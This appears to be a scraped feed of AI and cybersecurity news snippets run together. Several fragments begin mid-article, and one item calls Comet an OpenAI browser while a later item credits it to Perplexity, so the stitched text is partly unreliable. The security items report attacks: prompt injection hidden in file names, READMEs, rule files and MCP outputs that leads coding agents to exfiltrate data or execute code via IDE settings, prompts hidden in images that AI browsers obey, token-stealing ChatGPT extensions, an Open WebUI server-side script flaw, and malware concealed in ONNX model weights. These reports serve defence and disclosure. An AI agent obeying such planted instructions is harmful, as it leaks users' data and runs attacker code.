Privacy issues have always bothered users and business organizations. With the rapid adoption of AI, the threats are also rising. DuckDuckGo’s Duck.ai chatbot benefits from this.
The latest report from Similarweb revealed that traffic to Duck.ai increased rapidly last month. The traffic recorded 11.1 million visits in February 2026, 300% more than January.
The statistics seem small when compared with the most popular chatbots such as ChatGPT, Claude, or Gemini.
Similarweb estimates that ChatGPT recorded 5.4 billion visits in February 2026, and Google’s Gemini recorded 2.1 billion, whereas Claude recorded 290.3 million.
For DuckDuckGo, the numbers show a good sign, as the bot was launched as beta in 2025, and has shown a sharp rise in visits.
DuckDuckGo browser is known for its privacy, and the company aims to apply the same principle to its AI bot. Duck.ai doesn't run a bespoke LLM, it uses frontier models from Meta, Anthropic, and OpenAI, but it doesn't expose your IP address and personal data.
Duck.ai's privacy policy reads, "In addition, we have agreements in place with all model providers that further limit how they can use data from these anonymous requests, including not using Prompts and Outputs to develop or improve their models, as well as deleting all information received once it is no longer necessary to provide Outputs (at most within 30 days, with limited exceptions for safety and legal compliance),”
What is the reason for this sudden surge? The bot has two advantages over individual commercial bots like ChatGPT and Gemini, it offers an option to toggle between multiple models and better privacy security. The privacy aspect sets it apart. Users on Reddit have praised Duck.ai, one person noting "it's way better than Google's," which means Gemini.
In March, Anthropic rejected a few applications of its technology for mass surveillance and weapons submitted by the Department of Defense. The DoD retaliated by breaking the contract. Soon after, OpenAI stepped in.
The incident stirred controversies around privacy concerns and ethical AI use. This explains why users may prefer chatbots like Duck.ai that safeguard user data from both the government and the big tech.
Artificial intelligence is increasingly being used to help developers identify security weaknesses in software, and a new tool from OpenAI reflects that shift.
The company has introduced Codex Security, an automated security assistant designed to examine software projects, detect vulnerabilities, confirm whether they can actually be exploited, and recommend ways to fix them.
The feature is currently being released as a research preview and can be accessed through the Codex interface by users subscribed to ChatGPT Pro, Enterprise, Business, and Edu plans. OpenAI said customers will be able to use the capability without cost during its first month of availability.
According to the company, the system studies how a codebase functions as a whole before attempting to locate security flaws. By building a detailed understanding of how the software operates, the tool aims to detect complicated vulnerabilities that may escape conventional automated scanners while filtering out minor or irrelevant issues that can overwhelm security teams.
The technology is an advancement of Aardvark, an internal project that entered private testing in October 2025 to help development and security teams locate and resolve weaknesses across large collections of source code.
During the last month of beta testing, Codex Security examined more than 1.2 million individual code commits across publicly accessible repositories. The analysis produced 792 critical vulnerabilities and 10,561 issues classified as high severity.
Several well-known open-source projects were affected, including OpenSSH, GnuTLS, GOGS, Thorium, libssh, PHP, and Chromium.
Some of the identified weaknesses were assigned official vulnerability identifiers. These included CVE-2026-24881 and CVE-2026-24882 linked to GnuPG, CVE-2025-32988 and CVE-2025-32989 affecting GnuTLS, and CVE-2025-64175 along with CVE-2026-25242 associated with GOGS. In the Thorium browser project, researchers also reported seven separate issues ranging from CVE-2025-35430 through CVE-2025-35436.
OpenAI explained that the system relies on advanced reasoning capabilities from its latest AI models together with automated verification techniques. This combination is intended to reduce the number of incorrect alerts while producing remediation guidance that developers can apply directly.
Repeated scans of the same repositories during testing also showed measurable improvements in accuracy. The company reported that the number of false alarms declined by more than 50 percent while the precision of vulnerability detection increased.
The platform operates through a multi-step process. It begins by examining a repository in order to understand the structure of the application and map areas where security risks are most likely to appear. From this analysis, the system produces an editable threat model describing the software’s behavior and potential attack surfaces.
Using that model as a reference point, the tool searches for weaknesses and evaluates how serious they could be in real-world scenarios. Suspected vulnerabilities are then executed in a sandbox environment to determine whether they can actually be exploited.
When configured with a project-specific runtime environment, the system can test potential vulnerabilities directly against a functioning version of the software. In some cases it can also generate proof-of-concept exploits, allowing security teams to confirm the problem before deploying a fix.
Once validation is complete, the tool suggests code changes designed to address the weakness while preserving the original behavior of the application. This approach is intended to reduce the risk that security patches introduce new software defects.
The launch of Codex Security follows the introduction of Claude Code Security by Anthropic, another system that analyzes software repositories to uncover vulnerabilities and propose remediation steps.
The emergence of these tools reflects a broader trend within cybersecurity: using artificial intelligence to review vast amounts of software code, detect vulnerabilities earlier in the development cycle, and assist developers in securing critical digital infrastructure.
Mohan noted that the creator economy is another area of concern. According to YouTube's CEO, video producers will discover new revenue streams this year. The suggestions made include fan funding elements like jewelry and gifts, which will be included in addition to the current Super Chat, as well as shopping and brand bargains made possible by YouTube.
The business also hopes to grow YouTube Shopping, an affiliate program that lets content producers sell goods directly in their videos, shorts, and live streams. The business stated that it will implement in-app checkout in 2026, enabling users to make purchases without ever leaving the site.
Cybersecurity researchers are cautioning users against installing certain browser extensions that claim to improve ChatGPT functionality, warning that some of these tools are being used to steal sensitive data and gain unauthorized access to user accounts.
These extensions, primarily found on the Chrome Web Store, present themselves as productivity boosters designed to help users work faster with AI tools. However, recent analysis suggests that a group of these extensions was intentionally created to exploit users rather than assist them.
Researchers identified at least 16 extensions that appear to be connected to a single coordinated operation. Although listed under different names, the extensions share nearly identical technical foundations, visual designs, publishing timelines, and backend infrastructure. This consistency indicates a deliberate campaign rather than isolated security oversights.
As AI-powered browser tools become more common, attackers are increasingly leveraging their popularity. Many malicious extensions imitate legitimate services by using professional branding and familiar descriptions to appear trustworthy. Because these tools are designed to interact deeply with web-based AI platforms, they often request extensive permissions, which exponentially increases the potential impact of abuse.
Unlike conventional malware, these extensions do not install harmful software on a user’s device. Instead, they take advantage of how browser-based authentication works. To operate as advertised, the extensions require access to active ChatGPT sessions and advanced browser privileges. Once installed, they inject hidden scripts into the ChatGPT website that quietly monitor network activity.
When a logged-in user interacts with ChatGPT, the platform sends background requests that include session tokens. These tokens serve as temporary proof that a user is authenticated. The malicious extensions intercept these requests, extract the tokens, and transmit them to external servers controlled by the attackers.
Possession of a valid session token allows attackers to impersonate users without needing passwords or multi-factor authentication. This can grant access to private chat histories and any external services connected to the account, potentially exposing sensitive personal or organizational information. Some extensions were also found to collect additional data, including usage patterns and internal access credentials generated by the extension itself.
Investigators also observed synchronized publishing behavior, shared update schedules, and common server infrastructure across the extensions, reinforcing concerns that they are part of a single, organized effort.
While the total number of installations remains relatively low, estimated at fewer than 1,000 downloads, security experts warn that early-stage campaigns can scale rapidly. As AI-related extensions continue to grow in popularity, similar threats are likely to emerge.
Experts advise users to carefully evaluate browser extensions before installation, pay close attention to permission requests, and remove tools that request broad access without clear justification. Staying cautious is increasingly important as browser-based attacks become more subtle and harder to detect.
Artificial intelligence tools are expanding faster than any digital product seen before, reaching hundreds of millions of users in a short period. Leading technology companies are investing heavily in making these systems sound approachable and emotionally responsive. The goal is not only efficiency, but trust. AI is increasingly positioned as something people can talk to, rely on, and feel understood by.
This strategy is working because users respond more positively to systems that feel conversational rather than technical. Developers have learned that people prefer AI that is carefully shaped for interaction over systems that are larger but less refined. To achieve this, companies rely on extensive human feedback to adjust how AI responds, prioritizing politeness, reassurance, and familiarity. As a result, many users now turn to AI for advice on careers, relationships, and business decisions, sometimes forming strong emotional attachments.
However, there is a fundamental limitation that is often overlooked. AI does not have personal experiences, beliefs, or independent judgment. It does not understand success, failure, or responsibility. Every response is generated by blending patterns from existing information. What feels like insight is often a safe and generalized summary of commonly repeated ideas.
This becomes a problem when people seek meaningful guidance. Individuals looking for direction usually want practical insight based on real outcomes. AI cannot provide that. It may offer comfort or validation, but it cannot draw from lived experience or take accountability for results. The reassurance feels real, while the limitations remain largely invisible.
In professional settings, this gap is especially clear. When asked about complex topics such as pricing or business strategy, AI typically suggests well-known concepts like research, analysis, or optimization. While technically sound, these suggestions rarely address the challenges that arise in specific situations. Professionals with real-world experience know which mistakes appear repeatedly, how people actually respond to change, and when established methods stop working. That depth cannot be replicated by generalized systems.
As AI becomes more accessible, some advisors and consultants are seeing clients rely on automated advice instead of expert guidance. This shift favors convenience over expertise. In response, some professionals are adapting by building AI tools trained on their own methods and frameworks. In these cases, AI supports ongoing engagement while allowing experts to focus on judgment, oversight, and complex decision-making.
Another overlooked issue is how information shared with generic AI systems is used. Personal concerns entered into such tools do not inform better guidance or future improvement by a human professional. Without accountability or follow-up, these interactions risk becoming repetitive rather than productive.
Artificial intelligence can assist with efficiency, organization, and idea generation. However, it cannot lead, mentor, or evaluate. It does not set standards or care about outcomes. Treating AI as a substitute for human expertise risks replacing growth with comfort. Its value lies in support, not authority, and its effectiveness depends on how responsibly it is used.
Talking about WebUI, Cato researchers said, “When a platform of this size becomes vulnerable, the impact isn’t just theoretical. It affects production environments managing research data, internal codebases, and regulated information.”
The flaw is tracked as CVE-2025-64496 and found by Cato Networks experts. The vulnerability affects Open WebUI versions 0.6.34 and older if the Director Connection feature is allowed. The flaw has a severity rating of 7.3 out of 10.
The vulnerability exists inside Direct Connections, which allows users to connect Open WebUI to external OpenAI-supported model servers. While built for supporting flexibility and self-hosted AI workflows, the feature can be exploited if a user is tricked into linking with a malicious server pretending to be a genuine AI endpoint.
Fundamentally, the vulnerability comes from a trust relapse between unsafe model servers and the user's browser session. A malicious server can send a tailored server-sent events message that prompts the deployment of JavaScript code in the browser. This lets a threat actor steal authentication tokens stored in local storage. When the hacker gets these tokens, it gives them full access to the user's Open WebUI account. Chats, API keys, uploaded documents, and other important data is exposed.
Depending on user privileges, the consequences can be different.
Open WebUI maintainers were informed about the issue in October 2025, and publicly disclosed in November 2025, after patch validation and CVE assignment. Open WebUI variants 0.6.35 and later stop the compromised execute events, patching the user-facing threat.
Open WebUI’s security patch will work for v0.6.35 or “newer versions, which closes the user-facing Direct Connections vulnerability. However, organizations still need to strengthen authentication, sandbox extensibility and restrict access to specific resources,” according to Cato Networks researchers.
Beside this, the proposal will create a federal right for users to sue companies for misusing their personal data for AI model training without proper consent. The proposal allows statutory and punitive damages, attorney fees and injunctions.
Blackburn is planning to officially introduce the bill this year to codify President Donald Trump’s push for “one federal rule book” for AI, according to the press release.
The legislative framework comes on the heels of Trump’s signing of an executive order aimed at blocking “onerous” AI laws at the state level and promoting a national policy framework for the technology.
In order to ensure that there is a least burdensome national standard rather than fifty inconsistent State ones, the directive required the administration to collaborate with Congress.
Michael Kratsios, the president's science and technology adviser, and David Sacks, the White House special adviser for AI and cryptocurrency, were instructed by the president to jointly propose federal AI legislation that would supersede any state laws that would contradict with administration policy.
Blackburn stated in the Friday release that rather than advocating for AI amnesty, President Trump correctly urged Congress to enact federal standards and protections to address the patchwork of state laws that have impeded AI advancement.
The proposal will preempt state laws regulating the management of catastrophic AI risks. The legislation will also mostly “preempt” state laws for digital replicas to make a national standard for AI.
The proposal will not preempt “any generally applicable law, including a body of common law or a scheme of sectoral governance that may address” AI. The bill becomes effective 180 days after enforcement.
Adobe has expanded how users can edit images, create designs, and manage documents by integrating select features of its creative software directly into ChatGPT. This update allows users to make visual and document changes simply by describing what they want, without switching between different applications.
With the new integration, tools from Adobe Photoshop, Adobe Acrobat, and Adobe Express are now available inside the ChatGPT interface. Users can upload images or documents and activate an Adobe app by mentioning it in their request. Once enabled, the tool continues to work throughout the conversation, allowing multiple edits without repeatedly selecting the app.
For image editing, the Photoshop integration supports focused and practical adjustments rather than full professional workflows. Users can modify specific areas of an image, apply visual effects, or change settings such as brightness, contrast, and exposure. In some cases, ChatGPT presents multiple edited versions for users to choose from. In others, it provides interactive controls, such as sliders, to fine-tune the result manually.
The Acrobat integration is designed to simplify common document tasks. Users can edit existing PDF files, reduce file size, merge several documents into one, convert files into PDF format, and extract content such as text or tables. These functions are handled directly within ChatGPT once a file is uploaded and instructions are given.
Adobe Express focuses on design creation and quick visual content. Through ChatGPT, users can generate and edit materials like posters, invitations, and social media graphics. Every element of a design, including text, images, colors, and animations, can be adjusted through conversational prompts. If users later require more detailed control, their projects can be opened in Adobe’s standalone applications to continue editing.
The integrations are available worldwide on desktop, web, and iOS platforms. On Android, Adobe Express is already supported, while Photoshop and Acrobat compatibility is expected to be added in the future. These tools are free to use within ChatGPT, although advanced features in Adobe’s native software may still require paid plans.
This launch follows OpenAI’s broader effort to introduce third-party app integrations within ChatGPT. While some earlier app promotions raised concerns about advertising-like behavior, Adobe’s tools are positioned as functional extensions rather than marketing prompts.
By embedding creative and document tools into a conversational interface, Adobe aims to make design and editing more accessible to users who may lack technical expertise. The move also reflects growing competition in the AI space, where companies are racing to combine artificial intelligence with practical, real-world tools.
Overall, the integration represents a shift toward more interactive and simplified creative workflows, allowing users to complete everyday editing tasks efficiently while keeping professional software available for advanced needs.
A six-month research into AI-based development tools has disclosed over thirty security bugs that allow remote code execution (RCE) and data exfiltration. The findings by IDEsaster research revealed how AI agents deployed in IDEs like Visual Studio Code, Zed, JetBrains products and various commercial assistants can be tricked into leaking sensitive data or launching hacker-controlled code.
The research reports that 100% of tested AI IDEs and coding agents were vulnerable. Impacted products include GitHub, Windsurf, Copilot, Cursor, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. At least twenty-four assigned CVEs and additional AWS advisories were also included.
The main problem comes from the way AI agents interact with IDE features. Autonomous components that could read, edit, and create files were never intended for these editors. Once-harmless features turned become attack surfaces when AI agents acquired these skills. In their threat model, all AI IDEs essentially disregard the base software. Since these features have been around for years, they consider them to be naturally safe.
However, the same functionalities can be weaponized into RCE primitives and data exfiltration once autonomous AI bots are included. The research reported that this is an IDE-agnostic attack chain.
It begins with context hacking via prompt-injection. Covert instructions can be deployed in file names, rule files, READMEs, and outputs from malicious MCP servers. When an agent reads the context, the tool can be redirected to run authorized actions that activate malicious behaviours in the core IDE. The last stage exploits built-in features to steal data or run hacker code in AI IDEs sharing core software layers.
Writing a JSON file that references a remote schema is one example. Sensitive information gathered earlier in the chain is among the parameters inserted by the agent that are leaked when the IDE automatically retrieves that schema. This behavior was seen in Zed, JetBrains IDEs, and Visual Studio Code. The outbound request was not suppressed by developer safeguards like diff previews.
Another case study uses altered IDE settings to show complete remote code execution. An attacker can make the IDE execute arbitrary code as soon as a relevant file type is opened or created by updating an executable file that is already in the workspace and then changing configuration fields like php.validate.executablePath. Similar exposure is demonstrated by JetBrains utilities via workspace metadata.
According to the IDEsaster report, “It’s impossible to entirely prevent this vulnerability class short-term, as IDEs were not initially built following the Secure for AI principle. However, these measures can be taken to reduce risk from both a user perspective and a maintainer perspective.”
Today's information environment includes a wide range of communication. Social media platforms have enabled reposting, and comments. The platform is useful for both content consumers and creators, but it has its own challenges.
The rapid adoption of Generative AI has led to a significant increase in misleading content online. These chatbots have a tendency of generating false information which has no factual backing.
The internet is filled with AI slop- content that is made with minimal human input and is like junk. There is currently no mechanism to limit such massive production of harmful or misleading content that can impact human cognition and critical thinking. This calls for a robust mechanism that can address the new challenges that the current system is failing to tackle.
For restoring the integrity of digital information, Canada's Centre for Cyber Security (CCCS) and the UK's National Cyber Security Centre (NCSC) have launched a new report on public content provenance. Provenance means "place of origin." For building stronger trust with external audiences, businesses and organisations must improve the way they manage the source of their information.
NSSC chief technology officer said that the "new publication examines the emerging field of content provenance technologies and offers clear insights using a range of cyber security perspectives on how these risks may be managed.”
The industry is implementing few measures to address content provenance challenges like Coalition for Content Provenance and Authenticity (C2PA). It will benefit from the help of Generative AI and tech giants like Meta, Google, OpenAI, and Microsoft.
Currently, there is a pressing need for interoperable standards across various media types such as image, video, and text documents. Although there are content provenance technologies, this area is still in nascent stage.
The main tech includes genuine timestamps and cryptographically-proof meta to prove that the content isn't tampered. But there are still obstacles in development of these secure technologies, like how and when they are executed.
The present technology places the pressure on the end user to understand the provenance data.
A provenance system must allow a user to see who or what made the content, the time and the edits/changes that were made. Threat actors have started using GenAI media to make scams believable, it has become difficult to differentiate between what is fake and real. Which is why a mechanism that can track the origin and edit history of digital media is needed. The NCSC and CCCS report will help others to navigate this gray area with more clarity.
AI-powered threat hunting will only be successful if the data infrastructure is strong too.
Threat hunting powered by AI, automation, or human investigation will only ever be as effective as the data infrastructure it stands on. Sometimes, security teams build AI over leaked data or without proper data care. This can create issues later. It can affect both AI and humans. Even sophisticated algorithms can't handle inconsistent or incomplete data. AI that is trained on poor data will also lead to poor results.
A correlated data controls the operation. It reduces noise and helps in noticing patterns that manual systems can't.
Correlating and pre-transforming the data makes it easy for LLMs and other AI tools. It also allows connected components to surface naturally.
A same person may show up under entirely distinct names as an IAM principal in AWS, a committer in GitHub, and a document owner in Google Workspace. You only have a small portion of the truth when you look at any one of those signs.
You have behavioral clarity when you consider them collectively. While downloading dozens of items from Google Workspace may look strange on its own, it becomes obviously malevolent if the same user also clones dozens of repositories to a personal laptop and launches a public S3 bucket minutes later.
Correlations that previously took hours or were impossible become instant when data from logs, configurations, code repositories, and identification systems are all housed in one location.
For instance, lateral movement that uses short-lived credentials that have been stolen frequently passes across multiple systems before being discovered. A hacked developer laptop might take on several IAM roles, launch new instances, and access internal databases. Endpoint logs show the local compromise, but the extent of the intrusion cannot be demonstrated without IAM and network data.
Security researcher hxr1 discovered a far more conventional method of weaponizing rampant AI in a year when ingenious and sophisticated quick injection tactics have been proliferating. He detailed a living-off-the-land attack (LotL) that utilizes trusted files from the Open Neural Network Exchange (ONNX) to bypass security engines in a proof-of-concept (PoC) provided exclusively to Dark Reading.
Programs for cybersecurity are only as successful as their designers make them. Because these are known signs of suspicious activity, they may detect excessive amounts of data exfiltrating from a network or a foreign.exe file that launches. However, if malware appears on a system in a way they are unfamiliar with, they are unlikely to be aware of it.
That's the reason AI is so difficult. New software, procedures, and systems that incorporate AI capabilities create new, invisible channels for the spread of cyberattacks.
The Windows operating system has been gradually including features since 2018 that enable apps to carry out AI inference locally without requiring a connection to a cloud service. Inbuilt AI is used by Windows Hello, Photos, and Office programs to carry out object identification, facial recognition, and productivity tasks, respectively. They accomplish this by making a call to the Windows Machine Learning (ML) application programming interface (API), which loads ML models as ONNX files.
ONNX files are automatically trusted by Windows and security software. Why wouldn't they? Although malware can be found in EXEs, PDFs, and other formats, no threat actors in the wild have yet to show that they plan to or are capable of using neural networks as weapons. However, there are a lot of ways to make it feasible.
Planting a malicious payload in the metadata of a neural network is a simple way to infect it. The compromise would be that this virus would remain in simple text, making it much simpler for a security tool to unintentionally detect it.
Piecemeal malware embedding among the model's named nodes, inputs, and outputs would be more challenging but more covert. Alternatively, an attacker may utilize sophisticated steganography to hide a payload inside the neural network's own weights.
As long as you have a loader close by that can call the necessary Windows APIs to unpack it, reassemble it in memory, and run it, all three approaches will function. Additionally, both approaches are very covert. Trying to reconstruct a fragmented payload from a neural network would be like trying to reconstruct a needle from bits of it spread through a haystack.
One of the notes said, "Messages limit reached," "No models that are currently available support the tools in use," another stated.
Following that: "You've hit the free plan limit for GPT-5."
According to OpenAI, it will simplify and improve internet usage. One more step toward becoming "a true super-assistant." Super or not, however, assistants are not free, and the corporation must start generating significantly more revenue from its 800 million customers.
According to OpenAI, Atlas allows us to "rethink what it means to use the web". It appears to be comparable to Chrome or Apple's Safari at first glance, with one major exception: a sidebar chatbot. These are early days, but there is the potential for significant changes in how we use the Internet. What is certain is that this will be a high-end gadget that will only function properly if you pay a monthly subscription price. Given how accustomed we are to free internet access, many people would have to drastically change their routines.
The founding objective of OpenAI was to achieve artificial general intelligence (AGI), which roughly translates to AI that can match human intelligence. So, how does a browser assist with this mission? It actually doesn't. However, it has the potential to increase revenue. The company has persuaded venture capitalists and investors to spend billions of dollars in it, and it must now demonstrate a return on that investment. In other words, it needs to generate revenue. However, obtaining funds through typical internet advertising may be risky. Atlas might also grant the corporation access to a large amount of user data.
The ultimate goal of these AI systems is scale; the more data you feed them, the better they will become. The web is built for humans to use, so if Atlas can observe how we order train tickets, for example, it will be able to learn how to better traverse these processes.
Then we get to compete. Google Chrome is so prevalent that authorities throughout the world are raising their eyebrows and using terms like "monopoly" to describe it. It will not be easy to break into that market.
Google's Gemini AI is now integrated into the search engine, and Microsoft has included Copilot to its Edge browser. Some called ChatGPT the "Google killer" in its early days, predicting that it would render online search as we know it obsolete. It remains to be seen whether enough people are prepared to pay for that added convenience, and there is still a long way to go before Google is dethroned.
The future of browsing is AI, it watches everything you do online. Security and privacy are two different things; they may look same, but it is different for people who specialize in these two. Threats to your security can also be dangers to privacy.
Security and privacy aren’t always the same thing, but there’s a reason that people who specialize in one care deeply about the other.
Recently, OpenAI released its ChatGPT-powered Comet Browser, and Brave Software team disclosed that AI-powered browsers can follow malicious prompts that hide in images on the web.
We have long known that AI-powered browsers (and AI browser add-ons for other browsers) are vulnerable to a type of attack known as a prompt injection attack. But this is the first time we've seen the browser execute commands that are concealed from the user.
That is the aspect of security. Experts who evaluated the Comet Browser discovered that it records everything you do while using it, including search and browser history as well as information about the URLs you visit.
In short, while new AI-powered browser tools do fulfill the promise of integrating your favorite chatbot into your web browsing experience, their developers have not yet addressed the privacy and security threats they pose. Be careful when using these.
Researchers studied the ten biggest VPN attacks in recent history. Many of them were not even triggered by foreign hostile actors; some were the result of basic human faults, such as leaked credentials, third-party mistakes, or poor management.
Atlas, an AI-powered web browser developed with ChatGPT as its core, is meant to do more than just allow users to navigate the internet. It is capable of reading, sum up, and even finish internet tasks for the user, such as arranging appointments or finding lodgings.
Atlas looked for social media posts and other websites that mentioned or discussed the story. For the New York Times piece, a summary was created utilizing information from other publications such as The Guardian, The Washington Post, Reuters, and The Associated Press, all of which have partnerships or agreements with OpenAI, with the exception of Reuters.
OpenAI has officially entered the web-browsing market with ChatGPT Atlas, a new browser built on Chromium: the same open-source base that powers Google Chrome. At first glance, Atlas looks and feels almost identical to Chrome or Safari. The key difference is its built-in ChatGPT assistant, which allows users to interact with web pages directly. For example, you can ask ChatGPT to summarize a site, book tickets, or perform online actions automatically, all from within the browser interface.
While this innovation promises faster and more efficient browsing, privacy experts are increasingly worried about how much personal data the browser collects and retains.
How ChatGPT Atlas Uses “Memories”
Atlas introduces a feature called “memories”, which allows the system to remember users’ activity and preferences over time. This builds on ChatGPT’s existing memory function, which stores details about users’ interests, writing styles, and previous interactions to personalize future responses.
In Atlas, these memories could include which websites you visit, what products you search for, or what tasks you complete online. This helps the browser predict what you might need next, such as recalling the airline you often book with or your preferred online stores. OpenAI claims that this data collection aims to enhance user experience, not exploit it.
However, this personalization comes with serious privacy implications. Once stored, these memories can gradually form a comprehensive digital profile of an individual’s habits, preferences, and online behavior.
OpenAI’s Stance on Early Privacy Concerns
OpenAI has stated that Atlas will not retain critical information such as government-issued IDs, banking credentials, medical or financial records, or any activity related to adult content. Users can also manage their data manually: deleting, archiving, or disabling memories entirely, and can browse in incognito mode to prevent the saving of activity.
Despite these safeguards, recent findings suggest that some sensitive data may still slip through. According to The Washington Post, an investigation by a technologist at the Electronic Frontier Foundation (EFF) revealed that Atlas had unintentionally stored private information, including references to sexual and reproductive health services and even a doctor’s real name. These findings raise questions about the reliability of OpenAI’s data filters and whether user privacy is being adequately protected.
Broader Implications for AI Browsers
OpenAI is not alone in this race. Other companies, including Perplexity with its upcoming browser Comet, have also faced criticism for extensive data collection practices. Perplexity’s CEO openly admitted that collecting browser-level data helps the company understand user behavior beyond the AI app itself, particularly for tailoring ads and content.
The rise of AI-integrated browsers marks a turning point in internet use, combining automation and personalization at an unprecedented scale. However, cybersecurity experts warn that AI agents operating within browsers hold immense control — they can take actions, make purchases, and interact with websites autonomously. This power introduces substantial risks if systems malfunction, are exploited, or process data inaccurately.
What Users Can Do
For those concerned about privacy, experts recommend taking proactive steps:
• Opt out of the memory feature or regularly delete saved data.
• Use incognito mode for sensitive browsing.
• Review data-sharing and model-training permissions before enabling them.
AI browsers like ChatGPT Atlas may redefine digital interaction, but they also test the boundaries of data ethics and security. As this technology evolves, maintaining user trust will depend on transparency, accountability, and strict privacy protection.
That's the hidden price of agentic AI, your every plan, act, and prompt gets registered, forecasts and logs hints of frequent routines reside info long-term storage.
These logs aren't silly mistakes. They are standard behaviour for most agentic AI systems. Fortunately, there's another way. Easy engineering methods build efficiency and autonomy while limiting the digital footprint.
It uses a planner based on a LLM to optimize similiar devices via the house. It surveills electricity prices and weather details, configures thermostats, adjusting smart plugs, and schedules EV charge.
To limit personal data, the system registers only pseudonomymous resident profiles locally and doesn't access microphones and cameras. Agentic AI updates its plan when the weather or prices change, and registers short, planned reflections to strengthen future runs.
However, you as a home resident may not be aware about how much private data is being stored behind your back. Agentic AI systems create information as a natural result of how they function. In baseline agent configurations (mostly), the data gets accumulated. However, this is not considered the best tactic in the business, like configuration is a practical initial point for activating Agentic AI and function smoothly.
Limit memory to the task at hand.
The deleting process should be thorough and easy.
The agent's action should be transparent via a readable "agent trace."